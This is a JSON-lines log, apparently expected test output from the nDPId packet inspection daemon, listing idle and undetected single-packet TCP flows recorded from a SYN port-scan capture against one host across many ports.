-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":144,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1384,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":146,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1384,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":146,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1346,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4242,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1346,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4242,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1465,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":146,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1465,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":146,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1399,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4242,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1399,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4242,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":594,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2196,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":594,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2196,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":661,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2196,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":661,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2196,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":506,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2200,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":506,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2200,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":525,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2200,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":525,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2200,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1634,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":161,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1634,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":161,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1707,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":161,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1707,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":161,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":504,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":163,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":504,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":163,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":527,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":163,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":527,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":163,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2222,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2222,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1891,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":179,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"BGP","breed":"Acceptable","category":"Network"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1891,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":179,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1961,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":179,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"BGP","breed":"Acceptable","category":"Network"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1961,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":179,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":917,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4279,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":917,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4279,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":980,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4279,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":980,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4279,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1669,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8383,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1669,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8383,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1733,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061051,"flow_last_seen":1278275061051,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8383,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1733,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061051,"flow_last_seen":1278275061051,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8383,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00591{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":199,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":199,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":199,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":199,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":461,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6346,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":461,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6346,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 